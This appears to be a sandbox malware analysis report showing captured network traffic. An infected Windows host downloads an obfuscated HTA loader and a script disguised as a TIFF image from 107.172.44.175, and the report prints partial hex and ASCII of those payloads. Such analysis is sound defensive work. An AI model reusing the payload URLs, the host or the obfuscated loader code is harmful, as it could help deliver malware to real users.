Data Raw:	01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 fe ce 57 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 15:48:58.373936892 CET	54562	53	192.168.2.22	8.8.8.8
Nov 26, 2024 15:48:58.636279106 CET	53	54562	8.8.8.8	192.168.2.22
Nov 26, 2024 15:49:02.862205029 CET	52917	53	192.168.2.22	8.8.8.8
Nov 26, 2024 15:49:03.124542952 CET	53	52917	8.8.8.8	192.168.2.22
Nov 26, 2024 15:49:03.125518084 CET	52917	53	192.168.2.22	8.8.8.8
Nov 26, 2024 15:49:03.267273903 CET	53	52917	8.8.8.8	192.168.2.22
Nov 26, 2024 15:49:03.267580032 CET	52917	53	192.168.2.22	8.8.8.8
Nov 26, 2024 15:49:03.401997089 CET	53	52917	8.8.8.8	192.168.2.22
Nov 26, 2024 15:49:03.402331114 CET	52917	53	192.168.2.22	8.8.8.8
Nov 26, 2024 15:49:03.685038090 CET	53	52917	8.8.8.8	192.168.2.22
Nov 26, 2024 15:49:22.656178951 CET	62751	53	192.168.2.22	8.8.8.8
Nov 26, 2024 15:49:23.042334080 CET	53	62751	8.8.8.8	192.168.2.22
Nov 26, 2024 15:49:23.046621084 CET	57893	53	192.168.2.22	8.8.8.8
Nov 26, 2024 15:49:23.295260906 CET	53	57893	8.8.8.8	192.168.2.22

Timestamp	Bytes transferred	Direction	Data
Nov 26, 2024 15:49:00.956290960 CET	411	OUT	GET /1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 107.172.44.175 Connection: Keep-Alive
Nov 26, 2024 15:49:02.095856905 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 14:49:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Tue, 26 Nov 2024 08:25:56 GMT ETag: "10deaf-627cc9922fce5" Accept-Ranges: bytes Content-Length: 1105583 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 53 63 72 69 70 74 25 32 35 32 35 32 30 4c 61 6e 67 75 61 67 65 25 32 35 32 35 33 44 25 32 35 32 35 32 37 4a 61 76 61 73 63 72 69 70 74 25 32 35 32 35 32 37 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 25 32 35 32 35 32 31 2d 2d 25 32 35 32 35 32 30 48 54 4d 4c 25 32 35 32 35 32 30 45 6e 63 72 79 70 74 69 6f 6e 25 32 35 32 35 32 30 70 72 6f 76 69 64 65 64 25 32 35 32 35 32 30 62 79 25 32 35 32 35 32 30 74 75 66 61 74 2e 63 6f 6d 25 32 35 32 35 32 30 2d 2d 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 25 32 35 32 35 32 31 2d 2d 25 32 35 32 35 30 41 64 6f 63 75 6d 65 [TRUNCATED] Data Ascii: <script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253CScript%252520Language%25253D%252527Javascript%252527%25253E%25250A%25253C%252521--%252520HTML%252520Encryption%252520provided%252520by%252520tufat.com%252520--%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252527%2525253C%25252573%25252563%25252572%25252569%25252570%25252574%25252520%2525256C%25252561%2525256E%25252567%25252575%25252561%25252567%25252565%2525253D%2525254A%25252561%25252576%25252561%25252553%25252563%25252572%25252569%25252570%25252574%2525253E%2525256D%2525253D%25252527%25252525%25252533%25252543%25252553%25252563%25252572%25252569%25252570%25252574%25252525%25252532%25252530%2525254C%25252561%2525256E%25252567%25252575%25252561%25252567%25252565%25252525%25252533%25252544%25252525%25252532%25252537%2525254A%25252561%2525257
Nov 26, 2024 15:49:02.095985889 CET	1236	IN	Data Raw: 36 25 32 35 32 35 32 35 36 31 25 32 35 32 35 32 35 37 33 25 32 35 32 35 32 35 36 33 25 32 35 32 35 32 35 37 32 25 32 35 32 35 32 35 36 39 25 32 35 32 35 32 35 37 30 25 32 35 32 35 32 35 37 34 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 Data Ascii: 6%25252561%25252573%25252563%25252572%25252569%25252570%25252574%25252525%25252532%25252537%25252525%25252533%25252545%25252525%25252530%25252541%25252525%25252533%25252543%25252525%25252532%25252531%2525252D%2525252D%25252525%25252532%2525253
Nov 26, 2024 15:49:02.096003056 CET	1236	IN	Data Raw: 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 34 25 32 35 32 35 32 35 33 34 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 34 25 32 35 32 35 32 35 34 36 25 32 35 32 35 32 35 32 35 25 32 35 Data Ascii: 5252535%25252534%25252534%25252525%25252532%25252535%25252534%25252546%25252525%25252532%25252535%25252534%25252533%25252525%25252532%25252535%25252535%25252534%25252525%25252532%25252535%25252535%25252539%25252525%25252532%25252535%25252535%2
Nov 26, 2024 15:49:02.096559048 CET	1236	IN	Data Raw: 32 35 33 35 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 36 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 Data Ascii: 2535%25252525%25252532%25252535%25252536%25252539%25252525%25252532%25252535%25252537%25252536%25252525%25252532%25252535%25252533%25252544%25252525%25252532%25252535%25252532%25252532%25252525%25252532%25252535%25252535%25252538%25252525%2525
Nov 26, 2024 15:49:02.096571922 CET	1236	IN	Data Raw: 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 37 25 32 35 32 35 32 35 33 34 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 33 25 32 35 32 35 32 35 34 34 25 32 35 32 35 32 35 32 35 Data Ascii: 2%25252535%25252537%25252534%25252525%25252532%25252535%25252533%25252544%25252525%25252532%25252535%25252532%25252532%25252525%25252532%25252535%25252534%25252539%25252525%25252532%25252535%25252534%25252535%25252525%25252532%25252535%2525253
Nov 26, 2024 15:49:02.096585035 CET	1236	IN	Data Raw: 35 32 35 32 35 34 33 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 36 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 Data Ascii: 5252543%25252525%25252532%25252535%25252536%25252532%25252525%25252532%25252535%25252536%25252546%25252525%25252532%25252535%25252536%25252534%25252525%25252532%25252535%25252537%25252539%25252525%25252532%25252535%25252533%25252545%25252525%2
Nov 26, 2024 15:49:02.097279072 CET	776	IN	Data Raw: 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 36 25 32 35 32 35 32 35 33 33 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 Data Ascii: 2532%25252535%25252536%25252533%25252525%25252532%25252535%25252535%25252532%25252525%25252532%25252535%25252536%25252539%25252525%25252532%25252535%25252537%25252530%25252525%25252532%25252535%25252537%25252534%25252525%25252532%25252535%2525
Nov 26, 2024 15:49:02.097295046 CET	1236	IN	Data Raw: 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 Data Ascii: 35%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%252525
Nov 26, 2024 15:49:02.097309113 CET	1236	IN	Data Raw: 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 Data Ascii: 25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%
Nov 26, 2024 15:49:02.097322941 CET	1236	IN	Data Raw: 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 Data Ascii: 52535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%252
Nov 26, 2024 15:49:02.216317892 CET	1236	IN	Data Raw: 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 Data Ascii: 39%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%252525

Timestamp	Bytes transferred	Direction	Data
Nov 26, 2024 15:49:06.028186083 CET	489	OUT	GET /1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Range: bytes=8894- Connection: Keep-Alive Host: 107.172.44.175 If-Range: "10deaf-627cc9922fce5"
Nov 26, 2024 15:49:07.144638062 CET	1236	IN	HTTP/1.1 206 Partial Content Date: Tue, 26 Nov 2024 14:49:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Tue, 26 Nov 2024 08:25:56 GMT ETag: "10deaf-627cc9922fce5" Accept-Ranges: bytes Content-Length: 1096689 Content-Range: bytes 8894-1105582/1105583 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta Data Raw: 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 [TRUNCATED] Data Ascii: 2532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%2525253
Nov 26, 2024 15:49:07.144794941 CET	1236	IN	Data Raw: 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 Data Ascii: 2%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%2525253
Nov 26, 2024 15:49:07.144809008 CET	1236	IN	Data Raw: 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 Data Ascii: 5252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%2
Nov 26, 2024 15:49:07.145272970 CET	1236	IN	Data Raw: 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 Data Ascii: 2532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%2525
Nov 26, 2024 15:49:07.145574093 CET	1236	IN	Data Raw: 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 Data Ascii: 0%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%2525252
Nov 26, 2024 15:49:07.145586014 CET	1236	IN	Data Raw: 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 Data Ascii: 5252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%2
Nov 26, 2024 15:49:07.146167040 CET	776	IN	Data Raw: 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 Data Ascii: 2530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%2525
Nov 26, 2024 15:49:07.146217108 CET	1236	IN	Data Raw: 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 Data Ascii: 39%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%252525
Nov 26, 2024 15:49:07.146229029 CET	1236	IN	Data Raw: 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 Data Ascii: 25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%
Nov 26, 2024 15:49:07.147032022 CET	1236	IN	Data Raw: 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 Data Ascii: 52539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%252
Nov 26, 2024 15:49:07.265093088 CET	1236	IN	Data Raw: 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 Data Ascii: 32%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%252525

Timestamp	Bytes transferred	Direction	Data
Nov 26, 2024 15:49:15.109826088 CET	389	OUT	GET /1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 107.172.44.175 Connection: Keep-Alive
Nov 26, 2024 15:49:16.286005020 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 14:49:15 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Tue, 26 Nov 2024 08:11:02 GMT ETag: "288da-627cc63e3edba" Accept-Ranges: bytes Content-Length: 166106 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 72 00 69 00 7a 00 53 00 4b 00 6d 00 62 00 63 00 55 00 55 00 47 00 69 00 4b 00 74 00 64 00 20 00 3d 00 20 00 22 00 47 00 47 00 42 00 43 00 55 00 68 00 6b 00 47 00 6c 00 74 00 47 00 62 00 64 00 4b 00 6f 00 22 00 0d 00 0a 00 6d 00 4c 00 74 00 47 00 71 00 4c 00 70 00 67 00 4e 00 7a 00 64 00 6d 00 78 00 6f 00 4e 00 20 00 3d 00 20 00 22 00 63 00 75 00 4c 00 65 00 74 00 74 00 52 00 57 00 51 00 4c 00 63 00 50 00 41 00 41 00 64 00 22 00 0d 00 0a 00 48 00 63 00 70 00 63 00 4c 00 52 00 6d 00 4b 00 41 00 4c 00 66 00 4c 00 57 00 51 00 5a 00 20 00 3d 00 20 00 22 00 4b 00 4f 00 6c 00 62 00 55 00 66 00 68 00 4c 00 61 00 4b 00 74 00 4f 00 41 00 6b 00 69 00 22 00 0d 00 0a 00 6d 00 78 00 7a 00 65 00 78 00 63 00 62 00 5a 00 41 00 6b 00 66 00 57 00 50 00 41 00 74 00 20 00 3d 00 20 00 22 00 48 00 4f 00 55 00 6b 00 74 00 4c 00 50 00 4c 00 47 00 41 00 4b 00 64 00 50 00 62 00 63 00 22 00 0d 00 0a 00 5a 00 70 00 7a 00 63 00 70 00 70 00 4c 00 5a 00 7a 00 4c 00 63 00 57 00 64 00 70 00 74 00 20 00 [TRUNCATED] Data Ascii: rizSKmbcUUGiKtd = "GGBCUhkGltGbdKo"mLtGqLpgNzdmxoN = "cuLettRWQLcPAAd"HcpcLRmKALfLWQZ = "KOlbUfhLaKtOAki"mxzexcbZAkfWPAt = "HOUktLPLGAKdPbc"ZpzcppLZzLcWdpt = "gfxLGLARAWUWiaW"LLoLOoogPJNWGhL = "BUWiGWWGkLNuWGN"WeWLILtzkiWeZWK = "xUiKIcGoNniWWqf"LhKWNCBRdOaeLeL = "WiaWiKzdzBdBpPi"PGpuKkSfmNAoWLh = "RAfLrpHcmkLWsWU"uKjrzoWnOaWmGWC = "kKPIlRCAcGLWLha"ccoLmUeNcfBfWvo = "rPcTNPciPoLNhqk"uULBgcaOisfpLKL = "xgWnLkbZfURGOWc"qBscQziR
Nov 26, 2024 15:49:16.286130905 CET	1236	IN	Data Raw: 00 63 00 6f 00 4c 00 69 00 6a 00 4c 00 64 00 20 00 3d 00 20 00 22 00 57 00 57 00 74 00 57 00 4c 00 49 00 70 00 57 00 63 00 6f 00 4f 00 50 00 47 00 69 00 47 00 22 00 0d 00 0a 00 51 00 4c 00 72 00 62 00 4c 00 4b 00 72 00 48 00 4c 00 4c 00 6d 00 4c Data Ascii: coLijLd = "WWtWLIpWcoOPGiG"QLrbLKrHLLmLLfL = "xQrGZWUktemjZfA"GTfukcfLZpLecsW = "BWxcHcinAiGhhNb"xOAAagkLLxaCiKs =
Nov 26, 2024 15:49:16.286144018 CET	1236	IN	Data Raw: 00 4c 00 64 00 4c 00 48 00 55 00 6a 00 62 00 47 00 71 00 72 00 57 00 61 00 4e 00 22 00 0d 00 0a 00 64 00 75 00 6f 00 4b 00 69 00 48 00 41 00 67 00 43 00 47 00 75 00 4c 00 51 00 74 00 52 00 20 00 3d 00 20 00 22 00 43 00 62 00 57 00 57 00 4c 00 63 Data Ascii: LdLHUjbGqrWaN"duoKiHAgCGuLQtR = "CbWWLcspigLmmpC"CudGANZRrGhdLlU = "eeghPepuULZLPKu"OjhBzoGrRLKmxrL = "bTcfWUdRzm
Nov 26, 2024 15:49:16.286673069 CET	1236	IN	Data Raw: 00 64 00 4c 00 22 00 0d 00 0a 00 4e 00 61 00 57 00 50 00 4c 00 71 00 48 00 72 00 51 00 4c 00 57 00 4c 00 63 00 57 00 64 00 20 00 3d 00 20 00 22 00 66 00 70 00 47 00 6e 00 4b 00 52 00 4b 00 73 00 55 00 4c 00 57 00 4c 00 4f 00 6d 00 76 00 22 00 0d Data Ascii: dL"NaWPLqHrQLWLcWd = "fpGnKRKsULWLOmv"coiUUCIapmiBcAW = "kahmUULoWAqAhRK"flzkWjBTcKqxtLL = "KWWatzZOiWacfPc"WaNqB
Nov 26, 2024 15:49:16.286684036 CET	1236	IN	Data Raw: 00 6f 00 52 00 4c 00 75 00 55 00 68 00 42 00 54 00 6d 00 20 00 3d 00 20 00 22 00 43 00 6d 00 68 00 57 00 4e 00 47 00 74 00 65 00 4f 00 55 00 76 00 57 00 50 00 65 00 65 00 22 00 0d 00 0a 00 63 00 57 00 66 00 42 00 4c 00 6c 00 57 00 6b 00 74 00 69 Data Ascii: oRLuUhBTm = "CmhWNGteOUvWPee"cWfBLlWktiPSkZG = "HpiWWTatnLNWZLc"bkGpuiUPRAcOdGK = "tbRsgKepGhKqOPZ"WmeAcLKcsnToLRp
Nov 26, 2024 15:49:16.286695004 CET	1236	IN	Data Raw: 00 4a 00 57 00 6e 00 6c 00 22 00 0d 00 0a 00 4b 00 47 00 50 00 72 00 55 00 41 00 47 00 53 00 52 00 4b 00 69 00 69 00 76 00 71 00 41 00 20 00 3d 00 20 00 22 00 41 00 67 00 5a 00 70 00 65 00 72 00 69 00 63 00 68 00 6f 00 6e 00 64 00 72 00 69 00 74 Data Ascii: JWnl"KGPrUAGSRKiivqA = "AgZperichondriteKpLGiKfJiz"bhoqaaKoOLJLims = "jiLpWhCgAZiWcGb"QUqozbKCNcKkLeN = "aURbxZLU
Nov 26, 2024 15:49:16.287606955 CET	1236	IN	Data Raw: 00 6b 00 69 00 7a 00 57 00 6e 00 63 00 4c 00 55 00 57 00 63 00 4b 00 20 00 3d 00 20 00 22 00 71 00 71 00 64 00 47 00 47 00 5a 00 76 00 6b 00 50 00 6b 00 6b 00 6f 00 4e 00 63 00 50 00 22 00 0d 00 0a 00 4b 00 57 00 74 00 53 00 55 00 78 00 6f 00 4b Data Ascii: kizWncLUWcK = "qqdGGZvkPkkoNcP"KWtSUxoKKGAIOOi = "pkuhiUklOLHUhlN"iUjLWLWflUiNgrt = "atLbvPLLLWqsPnL"ZNzGgCAWGGLikA
Nov 26, 2024 15:49:16.287623882 CET	1236	IN	Data Raw: 00 4a 00 4c 00 76 00 6f 00 69 00 4e 00 63 00 48 00 22 00 0d 00 0a 00 64 00 50 00 6f 00 71 00 57 00 61 00 6b 00 65 00 4b 00 69 00 57 00 4b 00 53 00 4b 00 6f 00 20 00 3d 00 20 00 22 00 66 00 55 00 55 00 7a 00 43 00 47 00 41 00 41 00 4c 00 71 00 6a Data Ascii: JLvoiNcH"dPoqWakeKiWKSKo = "fUUzCGAALqjAKnU"ipUNKLzLHfWNqkR = "UmUmkAoWHWfxWOn"ZRdoahWbbciHAic = "IsjLhqbUWaKWOLR"
Nov 26, 2024 15:49:16.287635088 CET	1236	IN	Data Raw: 00 66 00 65 00 69 00 78 00 4a 00 6f 00 4b 00 63 00 4f 00 57 00 6f 00 57 00 64 00 20 00 3d 00 20 00 22 00 7a 00 43 00 6c 00 70 00 70 00 6c 00 78 00 55 00 65 00 4f 00 64 00 4b 00 66 00 65 00 66 00 22 00 0d 00 0a 00 6b 00 50 00 61 00 6b 00 6c 00 65 Data Ascii: feixJoKcOWoWd = "zClpplxUeOdKfef"kPakleBKcBfbnpU = "soBLzkakLWcteLZ"uCtGNmWzJRPGmLG = "ULbigxhcpfIdGeU"zoiNgzUKRi
